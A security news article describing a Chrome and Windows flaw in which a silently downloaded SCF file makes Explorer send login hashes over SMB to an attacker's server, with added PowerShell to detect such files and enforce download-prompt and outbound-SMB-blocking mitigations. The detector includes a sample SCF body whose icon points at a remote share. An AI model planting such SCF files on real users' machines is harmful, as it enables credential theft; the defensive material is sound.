A Google Chrome vulnerability, which was uncovered by DefenceCode security engineer Bosko Stankovic, is said to allow hackers to download malware onto a victim’s PC in order to steal people’s Windows login credentials and launch SMB (Server Message Block) relay attacks, according to security experts.
Stankovic said in a blog post that he found the flaw in the default configuration of the latest version of Google’s Chrome running on any version of Microsoft’s Windows operating system, including Windows 10. The flaw shouldn’t just have IT admins worried, as it also poses a “significant threat” to large companies and even regular users. He also claimed that merely visiting a website that serves a malicious SCF (Shell Command File) file could cause victims to unknowingly share their computer’s login credentials with hackers via Chrome and the SMB protocol.
The attack technique that enables the credential theft is not new; it is a combination of two existing techniques, one taken from the Stuxnet operation (Stuxnet being a powerful piece of malware specially designed to destroy Iran’s nuclear program) and the other from a technique demonstrated at a Black Hat security conference by two security researchers.
Stealing Windows Credentials Centered Around SCF files:
According to Stankovic, the attack is pretty straightforward: victims are tricked into clicking on a malicious link, which triggers an automatic download of a Windows Explorer SCF file.
“SCF (Shell Command File) is a file format that supports a very limited set of Windows Explorer commands that help define an icon on your desktop, such as My Computer and Recycle Bin. Just like LNK files (shortcuts), SCF files, when stored on disk, will retrieve an icon file when the user loads the file in a Windows Explorer window.”
Stankovic explains that it’s very easy to get an SCF file onto a user’s computer. This is because, in its default configuration, Chrome automatically downloads files that it deems safe without prompting the user for a download location. Google deems SCF files safe, so Chrome has no reason to prompt the user for action.
The SCF file lies dormant until the victim opens the download directory in Windows Explorer. At that point Explorer tries to render the file’s icon, and because the file references an icon hosted on the hacker’s server, Explorer connects to that server over SMB and authenticates to it. This, in turn, provides the attacker with the victim’s username and hashed password.
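Because the dangerous part of an SCF file is simply an icon reference that points at a remote share, a defender can check a download folder for such files before Explorer ever renders them. The following PowerShell is an added example written for this page, not code from DefenceCode or from the article: it parses the INI-style `IconFile=` entry of each `.scf` file and flags values that are UNC paths to another host, leaving files whose icon comes from a local DLL or `.ico` unflagged. The function names and the two sample contents (one using a documentation-only TEST-NET address) are constructed for the demonstration.

```powershell
# Added example (not from the article or DefenceCode): find SCF files whose icon is
# fetched from a remote share. Explorer authenticates to that host when it draws the icon.

function Test-ScfContent {
    param(
        [Parameter(Mandatory)] [string] $Content,   # raw text of one SCF file
        [string] $Source = '<inline>'               # label used in the findings
    )
    $findings = @()
    foreach ($line in ($Content -split "`r?`n")) {
        $trimmed = $line.Trim()
        # SCF files are INI-style; the icon location lives in an IconFile= entry.
        # -match is case-insensitive by default in PowerShell.
        if ($trimmed -match '^IconFile\s*=\s*(.+)$') {
            $target = $Matches[1].Trim()
            # A UNC path (\\host\share or //host/share) means the icon lives on another machine.
            if ($target -match '^(\\\\|//)[^\\/]+') {
                $findings += [pscustomobject]@{
                    Source   = $Source
                    IconFile = $target
                    Reason   = 'Icon is fetched from a remote share; Explorer will authenticate to that host'
                }
            }
        }
    }
    return $findings
}

function Find-SuspiciousScf {
    param([Parameter(Mandatory)] [string] $Path)   # folder to scan, e.g. the Downloads folder
    Get-ChildItem -Path $Path -Filter '*.scf' -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            Test-ScfContent -Content (Get-Content -Path $_.FullName -Raw) -Source $_.FullName
        }
}

# Constructed sample 1: icon on a remote host (203.0.113.10 is a TEST-NET documentation address).
$remoteSample = @"
[Shell]
IconFile=\\203.0.113.10\share\icon.ico
"@

# Constructed sample 2: icon taken from a local system DLL, which is what benign SCF files do.
$localSample = @"
[Shell]
IconFile=%SystemRoot%\system32\shell32.dll,3
"@

# Expected: one finding for the remote sample, none for the local one.
Test-ScfContent -Content $remoteSample -Source 'constructed-remote.scf' | Format-Table -AutoSize
Test-ScfContent -Content $localSample  -Source 'constructed-local.scf'  | Format-Table -AutoSize

# Real use: scan the current user's default Chrome download folder.
Find-SuspiciousScf -Path (Join-Path $env:USERPROFILE 'Downloads') | Format-Table -AutoSize
```

The scan reads file contents only and never asks Explorer to render anything, so it is safe to run against a folder that already holds an untrusted SCF file. It is a spot check rather than a guarantee: the firewall and Chrome-policy measures described later in the article are what actually stop the credential leak.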
“Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse victim’s authentication credentials,” Stankovic wrote in a blog post, describing the flaw.
Defeating Windows Login Credential Theft:
The security researcher advises users to disable automatic downloads in Google Chrome. To do so, open ‘Show Advanced Settings’ in Settings and check ‘Ask where to save each file before downloading.’ This change forces Chrome to ask for your permission before downloading a file, which significantly decreases the risk of credential theft attacks using SCF files.
More advanced protection measures include blocking outbound SMB requests from the local network to the WAN via firewalls, so local computers can’t query remote SMB servers.
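For a fleet of Windows machines an administrator would enforce both mitigations centrally rather than rely on each user finding the Chrome settings dialog. The PowerShell below is an added example, not code from the article or from DefenceCode: it sets Chrome’s documented `PromptForDownloadLocation` enterprise policy (the policy the ‘Ask where to save each file’ checkbox corresponds to) and adds a Windows Firewall rule that blocks outbound SMB (TCP 139 and 445) to addresses the firewall classifies as Internet, then verifies both. The rule name and the `Test-ScfMitigations` helper are constructed for this example; run it from an elevated session.

```powershell
# Added example (not from the article or DefenceCode): enforce the two mitigations
# machine-wide. Requires an elevated (Administrator) PowerShell session.

# 1. Chrome's default is to save "safe" file types without asking. The documented
#    PromptForDownloadLocation policy, read from HKLM\SOFTWARE\Policies\Google\Chrome,
#    makes Chrome ask for a location on every download, as the article recommends.
$policyKey = 'HKLM:\SOFTWARE\Policies\Google\Chrome'
if (-not (Test-Path $policyKey)) {
    New-Item -Path $policyKey -Force | Out-Null
}
New-ItemProperty -Path $policyKey -Name 'PromptForDownloadLocation' `
    -Value 1 -PropertyType DWord -Force | Out-Null

# 2. Block outbound SMB to non-local addresses so Explorer cannot authenticate to a
#    share on the Internet. 'Internet' is a built-in Windows Firewall address keyword
#    for addresses outside the local network; 139 and 445 are the SMB ports.
$ruleName = 'Block outbound SMB to Internet'   # constructed rule name
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName -Direction Outbound -Action Block `
        -Protocol TCP -RemotePort 139,445 -RemoteAddress Internet -Profile Any | Out-Null
}

# 3. Verify that both settings are in place; returns one object with two booleans.
function Test-ScfMitigations {
    $prompt = (Get-ItemProperty -Path $policyKey -Name 'PromptForDownloadLocation' `
                -ErrorAction SilentlyContinue).PromptForDownloadLocation
    $rule = Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue
    [pscustomobject]@{
        ChromePromptsForLocation = ($prompt -eq 1)
        OutboundSmbBlocked       = ($null -ne $rule -and $rule.Enabled -eq 'True' -and $rule.Action -eq 'Block')
    }
}

Test-ScfMitigations
```

The host rule is defence in depth on top of the perimeter firewall block the article describes; it does not replace it, because a machine off the corporate network (a laptop at home) only has its own firewall. If the organization keeps file servers on routed subnets that the firewall classifies as Internet, add a second rule allowing those specific addresses before the block rule, or scope the block with `-RemoteAddress` to the address ranges you actually want to deny.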